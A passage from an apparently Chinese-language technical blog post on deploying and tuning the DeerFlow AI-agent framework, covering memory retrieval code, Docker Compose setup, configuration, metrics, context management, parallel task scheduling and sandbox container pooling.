        
        self.db.execute("""
            INSERT INTO memories 
            (id, user_id, content, memory_type, embedding, metadata)
            VALUES (?, ?, ?, ?, ?, ?)
        """, (
            memory_id, user_id, content, memory_type,
            embedding.tobytes(),
            json.dumps(metadata or {})
        ))
        
        self.db.commit()
        
        # 同时存入向量库
        if memory_type == "semantic":
            await self.vector_store.add(
                collection=f"user_{user_id}",
                documents=[content],
                embeddings=[embedding],
                metadatas=[{"memory_id": memory_id}]
            )
    
    async def retrieve(
        self,
        user_id: str,
        query: str,
        top_k: int = 10,
        memory_type: str = None
    ) -> List[Memory]:
        """检索相关记忆"""
        query_embedding = await self.embed(query)
        
        # 1. 向量检索
        if memory_type == "semantic" or memory_type is None:
            vector_results = await self.vector_store.search(
                collection=f"user_{user_id}",
                query_vector=query_embedding,
                top_k=top_k,
            )
        else:
            vector_results = []
        
        # 2. BM25 检索(情景记忆)
        if memory_type == "episodic" or memory_type is None:
            bm25_results = self._bm25_search(
                user_id, query, top_k, memory_type
            )
        else:
            bm25_results = []
        
        # 3. 融合排序
        combined = self._fuse_results(
            vector_results, bm25_results, query_embedding
        )
        
        # 4. 更新访问统计
        for mem in combined:
            self._update_access_stats(mem.id)
        
        return combined[:top_k]

八、实战部署:从开发到生产

8.1 开发环境快速启动

# 克隆仓库
git clone https://github.com/bytedance/DeerFlow.git
cd DeerFlow

# 使用 Docker Compose 启动
docker compose up -d

# 查看服务状态
docker compose ps

# 访问前端
open http://localhost:3000

8.2 生产环境部署

# docker-compose.prod.yml
version: "3.8"

services:
  nginx:
    image: nginx:alpine
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./nginx.prod.conf:/etc/nginx/nginx.conf
      - ./ssl:/etc/nginx/ssl
    depends_on:
      - langgraph-server
      - gateway

  langgraph-server:
    image: deerflow/langgraph:${VERSION}
    environment:
      - LANGGRAPH_API_URL=http://localhost:2024
      - CHECKPOINT_BACKEND=postgres
      - DATABASE_URL=postgresql://user:pass@postgres:5432/deerflow
    volumes:
      - checkpoints:/app/checkpoints
    depends_on:
      - postgres

  gateway:
    image: deerflow/gateway:${VERSION}
    environment:
      - SANDBOX_ENABLED=true
      - MEMORY_BACKEND=qdrant
      - QDRANT_URL=http://qdrant:6333
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
    depends_on:
      - qdrant

  postgres:
    image: postgres:15-alpine
    environment:
      POSTGRES_DB: deerflow
      POSTGRES_USER: user
      POSTGRES_PASSWORD: pass
    volumes:
      - pgdata:/var/lib/postgresql/data

  qdrant:
    image: qdrant/qdrant:latest
    volumes:
      - qdrant_data:/qdrant/storage

volumes:
  checkpoints:
  pgdata:
  qdrant_data:

8.3 配置优化

# config/production.py

# 模型配置
MODEL_CONFIG = {
    "default": "gpt-4-turbo",
    "fast": "gpt-3.5-turbo",
    "embedding": "text-embedding-3-small",
}

# 沙箱配置
SANDBOX_CONFIG = {
    "enabled": True,
    "image": "deerflow/sandbox:latest",
    "mem_limit": "4g",
    "cpu_quota": 200000,  # 2 CPUs
    "timeout": 300,  # 5 分钟超时
    "max_concurrent": 10,  # 最大并发容器数
}

# 记忆配置
MEMORY_CONFIG = {
    "working_memory_tokens": 8192,
    "episodic_backend": "postgres",
    "semantic_backend": "qdrant",
    "compression_threshold": 0.8,  # 80% 时触发压缩
}

# 技能配置
SKILLS_CONFIG = {
    "auto_load": True,
    "max_skills_per_task": 5,
    "skill_directories": [
        "/mnt/skills/public",
        "/mnt/skills/private",
    ],
}

8.4 监控与可观测性

from prometheus_client import Counter, Histogram, Gauge

# 定义指标
TASK_COUNTER = Counter(
    "deerflow_tasks_total",
    "Total tasks processed",
    ["status", "agent_type"]
)

TASK_DURATION = Histogram(
    "deerflow_task_duration_seconds",
    "Task execution duration",
    ["agent_type"]
)

ACTIVE_SANDBOXES = Gauge(
    "deerflow_active_sandboxes",
    "Number of active sandbox containers"
)

MEMORY_USAGE = Gauge(
    "deerflow_memory_tokens",
    "Current memory usage in tokens",
    ["memory_type"]
)


class MetricsMiddleware:
    """指标收集中间件"""
    
    async def __call__(self, state, next_middleware):
        start_time = time.time()
        
        try:
            result = await next_middleware(state)
            TASK_COUNTER.labels(
                status="success",
                agent_type=state.get("agent_type", "unknown")
            ).inc()
            return result
        except Exception as e:
            TASK_COUNTER.labels(
                status="error",
                agent_type=state.get("agent_type", "unknown")
            ).inc()
            raise
        finally:
            duration = time.time() - start_time
            TASK_DURATION.labels(
                agent_type=state.get("agent_type", "unknown")
            ).observe(duration)

九、性能优化与最佳实践

9.1 上下文优化

# 问题:上下文爆炸
# 解决:分层上下文管理

class ContextManager:
    def __init__(self, max_tokens: int = 8192):
        self.max_tokens = max_tokens
        self.layers = {
            "system": [],      # 系统提示,不可压缩
            "memory": [],      # 记忆上下文,可压缩
            "skills": [],      # 技能定义,按需加载
            "history": [],     # 对话历史,可压缩/截断
            "current": [],     # 当前输入,不可压缩
        }
    
    def build_context(self) -> str:
        """构建最终上下文"""
        context = []
        remaining_tokens = self.max_tokens
        
        # 1. 系统提示(必须)
        system_tokens = sum(t.token_count for t in self.layers["system"])
        context.extend(self.layers["system"])
        remaining_tokens -= system_tokens
        
        # 2. 当前输入(必须)
        current_tokens = sum(t.token_count for t in self.layers["current"])
        context.extend(self.layers["current"])
        remaining_tokens -= current_tokens
        
        # 3. 按优先级分配剩余空间
        for layer in ["memory", "skills", "history"]:
            layer_tokens = sum(t.token_count for t in self.layers[layer])
            
            if layer_tokens <= remaining_tokens:
                context.extend(self.layers[layer])
                remaining_tokens -= layer_tokens
            else:
                # 压缩或截断
                compressed = self.compress_layer(
                    self.layers[layer],
                    remaining_tokens
                )
                context.extend(compressed)
                remaining_tokens = 0
                break
        
        return "\n\n".join(t.content for t in context)

9.2 并行优化

# 问题:子任务串行执行效率低
# 解决:依赖图并行调度

import asyncio
from concurrent.futures import ThreadPoolExecutor

class ParallelOrchestrator:
    def __init__(self, max_workers: int = 4):
        self.executor = ThreadPoolExecutor(max_workers=max_workers)
    
    async def execute_dag(self, tasks: List[Task]) -> Dict[str, Any]:
        """按依赖图并行执行"""
        completed = {}
        pending = set(t.id for t in tasks)
        task_map = {t.id: t for t in tasks}
        
        while pending:
            # 找出所有就绪任务
            ready = [
                task_map[tid] for tid in pending
                if all(d in completed for d in task_map[tid].dependencies)
            ]
            
            if not ready:
                raise RuntimeError("Circular dependency detected")
            
            # 并行执行
            coroutines = [
                self.execute_task(task, completed)
                for task in ready
            ]
            
            results = await asyncio.gather(*coroutines, return_exceptions=True)
            
            for task, result in zip(ready, results):
                if isinstance(result, Exception):
                    # 错误处理:重试或跳过
                    await self.handle_error(task, result)
                else:
                    completed[task.id] = result
                    pending.remove(task.id)
        
        return completed

9.3 沙箱复用优化

# 问题:频繁创建/销毁容器开销大
# 解决:容器池

class SandboxPool:
    def __init__(self, pool_size: int = 10):
        self.pool = asyncio.Queue(maxsize=pool_size)
        self.all_containers = []
        
        # 预热池
        for _ in range(pool_size):
            container = self._create_container()
            self.pool.put_nowait(container)
            self.all_containers.append(container)
    
    async def acquire(self) -> Container:
        """获取容器"""
        container = await self.pool.get()
        
        # 重置容器状态
        await self.reset_container(container)
        
        return container
    
    async def release(self, container: Container):
        """归还容器"""
        await self.pool.put(container)
    
    async def reset_container(self, container: Container):
        """重置容器到干净状态"""
        # 清理工作目录
        container.exec_run("rm -rf /workspace/*")
        
        # 重置环境变量
        container.exec_run("unset PYTHONPATH")

十、总结与展望

10.1 DeerFlow 的核心价值

DeerFlow 代表了 AI Agent 开发的一个重要范式转变:

维度传统框架DeerFlow
定位积木工具箱完整运行时
安全无/弱Docker 沙箱隔离
记忆简单历史三层记忆架构
技能全量加载渐进式按需加载
协作单 AgentLead + Sub Agents
状态无持久化检查点 + 恢复

10.2 适用场景

推荐使用 DeerFlow:

  • 需要执行代码的 Agent(数据分析、代码生成)
  • 长时程复杂任务(深度研究、报告生成)
  • 多 Agent 协作场景(团队模拟、角色扮演)
  • 需要记忆持久化的个人助理

不推荐使用 DeerFlow:

  • 简单对话场景(用 LangChain 即可)
  • 无需代码执行(轻量框架更合适)
  • 极度资源受限环境(沙箱开销)

10.3 未来演进方向

  1. 更智能的技能发现:基于任务自动推荐技能组合
  2. 跨 Agent 通信:支持 Agent 间消息传递
  3. 人机协作增强:更精细的 interrupt 机制
  4. 多模态支持:图像、音频、视频处理能力
  5. 联邦记忆:跨用户的知识共享与隐私保护

DeerFlow 的开源标志着 AI Agent 从"玩具"走向"工具"的关键一步。它不仅仅是一个框架,更是一个经过生产验证的智能体运行时基础设施。对于想要构建真正能"干活"的 Agent 的开发者来说,DeerFlow 提供了完整的解决方案——从安全执行到记忆管理,从技能扩展到多 Agent 协作,开箱即用,生产就绪。

GitHub: https://github.com/bytedance/DeerFlow
Star: 50K+ (截至 2026 年 5 月)
License: Apache 2.0

推荐文章

Elasticsearch 聚合和分析
2024-11-19 06:44:08 +0800 CST
Golang 几种使用 Channel 的错误姿势
2024-11-19 01:42:18 +0800 CST
25个实用的JavaScript单行代码片段
2024-11-18 04:59:49 +0800 CST
使用 Nginx 获取客户端真实 IP
2024-11-18 14:51:58 +0800 CST
Gin 框架的中间件 代码压缩
2024-11-19 08:23:48 +0800 CST
Vue3中如何实现状态管理?
2024-11-19 09:40:30 +0800 CST
程序员茄子在线接单